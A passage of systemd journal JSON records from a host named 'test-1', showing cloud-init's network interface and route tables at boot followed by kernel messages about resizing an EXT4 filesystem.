"/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25b;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2de0cabb7107f1d7", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | ens3 | True | 192.168.10.95 | 255.255.255.0 | global | fa:16:3e:55:6a:e2 |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25c;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=233b249cf336f0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | ens3 | True | fe80::f816:3eff:fe55:6ae2/64 | . | link | fa:16:3e:55:6a:e2 |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25d;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=b46b42cabef260e0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25e;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=caac27a601f8a351", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | lo | True | ::1/128 | . | host | . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=25f;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=260;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=4a33c63bdc09703d", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: ++++++++++++++++++++++++++++++++Route IPv4 info+++++++++++++++++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=261;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=262;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a60f616505a8540b", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=263;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=264;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=e6c753992d003dbc", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 0 | 0.0.0.0 | 192.168.10.1 | 0.0.0.0 | ens3 | UG |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=265;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=de822f4a065b1b15", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 1 | 169.254.169.254 | 192.168.10.2 | 255.255.255.255 | ens3 | UGH |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=266;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2b92ad0a201ebd9e", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 2 | 192.168.10.0 | 0.0.0.0 | 255.255.255.0 | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=267;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=1829d704ad756d99", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-----------------+--------------+-----------------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=268;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=b229ce65b1002b2b", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=269;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26a;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=7f010c225ad3867e", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Route | Destination | Gateway | Interface | Flags |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26b;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26c;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=793b73d8c5f739c0", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 1 | fe80::/64 | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26d;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=2a8bc0b4a4e1dc94", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 3 | local | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26e;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=6e95665ae5a7b346", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | 4 | ff00::/8 | :: | ens3 | U |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=26f;b=e2b08827b5804427b422c10c84f1567e;m=282f7bd;t=5bd16df467724;x=a45ea851a091d2cd", "__REALTIME_TIMESTAMP" : "1615280816420644", "__MONOTONIC_TIMESTAMP" : "42137533", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +-------+-------------+---------+-----------+-------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=270;b=e2b08827b5804427b422c10c84f1567e;m=28a1619;t=5bd16df4d957f;x=df409df7f70e977c", "__REALTIME_TIMESTAMP" : "1615280816887167", "__MONOTONIC_TIMESTAMP" : "42604057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "42603851", "MESSAGE" : "EXT4-fs (vda1): resizing filesystem from 548091 to 5214459 blocks" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=271;b=e2b08827b5804427b422c10c84f1567e;m=28d13e2;t=5bd16df509348;x=ecaad3873edaaa81", "__REALTIME_TIMESTAMP" : "1615280817083208", "__MONOTONIC_TIMESTAMP" : "42800098", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "42796587", "MESSAGE" : "EXT4-fs (vda1): resized filesystem to 5214459" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=272;b=e2b08827b5804427b422c10c84f1567e;m=2904ac5;t=5bd16df53ca2c;x=c5f38dfaad45e50", "__REALTIME_TIMESTAMP" : "1615280817293868", "__MONOTONIC_TIMESTAMP" : "43010757", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", 